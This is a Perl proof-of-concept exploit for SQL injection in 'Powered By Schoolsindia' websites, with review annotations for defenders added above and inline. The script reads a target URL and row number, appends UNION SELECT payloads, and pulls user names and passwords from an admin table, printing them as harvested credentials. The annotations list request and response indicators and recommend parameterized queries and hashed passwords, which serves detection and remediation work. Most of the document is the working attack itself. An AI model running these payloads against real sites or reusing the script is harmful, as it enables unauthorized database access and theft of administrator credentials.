# Proof-of-concept for the SQL injection its banner attributes to
# "Powered By Schoolsindia" sites. The page gives no affected version and
# does not name the vulnerable parameter.
#
# What the script does, as visible below:
#   1. Reads a URL and a numeric ID from standard input.
#   2. Appends a UNION-based payload to the URL, once for the user_name
#      column and once for the pass_word column of a table named admin.
#   3. Fetches both URLs and prints whatever appears between two marker
#      strings in the response body.
#
# Notes for defenders (review annotations, not part of the original):
#   - The payload is appended directly to the supplied URL, so the URL
#     presumably ends in a numeric query parameter whose value reaches the
#     SQL statement unescaped. Confirm against the application code; the
#     fix is a bound/parameterized query plus integer validation of that
#     parameter.
#   - Request-side indicators: a query string containing
#     "union+all+select", "group_concat(", "from+admin", or the hex
#     literals 0x6963686565725f6e6f6f6d21 / 0x236963686565725f6e6f6f6d.
#   - Response-side indicator: the decoded markers "icheer_noom!" and
#     "#icheer_noom" appearing in a served page.
#   - No agent string is set, so requests carry LWP::UserAgent's default
#     "libwww-perl/<version>" User-Agent header.
#   - The script prints the pass_word value as "Password"; if that column
#     holds recoverable credentials, store salted password hashes instead.
#     Whether it does is not shown here.
#   - The web application's database account should not be able to read
#     the admin table from this code path if that can be avoided.
use LWP::UserAgent;
print "[+] Powered By Schoolsindia SQL Injection Vulnerability\n";
print "[+] By ICheer_No0M\n\n";
# Operator input: base URL and a 1-based row number.
print "[+] Input URL : ";
chomp($url=<stdin>);
print "[+] Input ID : ";
chomp($id=<stdin>);
# Convert the 1-based ID into the zero-based offset used in "limit <offset>,1".
$ids=$id-1;
# Payload fragments. "+" stands for a URL-encoded space. "and 1=2" makes the
# original query return no rows so only the UNION row remains. The UNION
# supplies nine columns; the third wraps group_concat(<column>) between the
# hex-encoded markers "icheer_noom!" and "#icheer_noom". Presumably column 3
# is the one the page reflects; the script does not verify this.
$user="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(user_name),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
$pass="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(pass_word),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
# Row count for LIMIT, followed by "--" to comment out the rest of the query.
$second=",1--";
$usertarget=$url.$user.$ids.$second;
$passtarget=$url.$pass.$ids.$second;
# Prefix the scheme when the input does not already start with "http://".
unless ($usertarget=~/^http:\/\//) {$usertarget='http://'.$usertarget;}
unless ($passtarget=~/^http:\/\//) {$passtarget='http://'.$passtarget;}
# First request: user_name. The HTTP status is not checked; only the body is
# searched for the text between the two markers.
$get=LWP::UserAgent->new->get($usertarget)->content;
if($get =~ /icheer_noom!(.*)#icheer_noom/) { print "[+] User : $1\n"; } else { print "[-] Failed !!!\n"; }
# Second request: pass_word, extracted the same way.
$get2=LWP::UserAgent->new->get($passtarget)->content;
if ($get2 =~ /icheer_noom!(.*)#icheer_noom/) { print "[+] Password : $1\n"; print "[-] Finish !!!\n"; } else { print "[-] Failed !!!\n"; print "[-] Finish !!!\n"; }
# Blocks on one more line of input before exiting; presumably this keeps a
# console window open.
<stdin>;
Ref : http://www.1337day.com/exploits/16633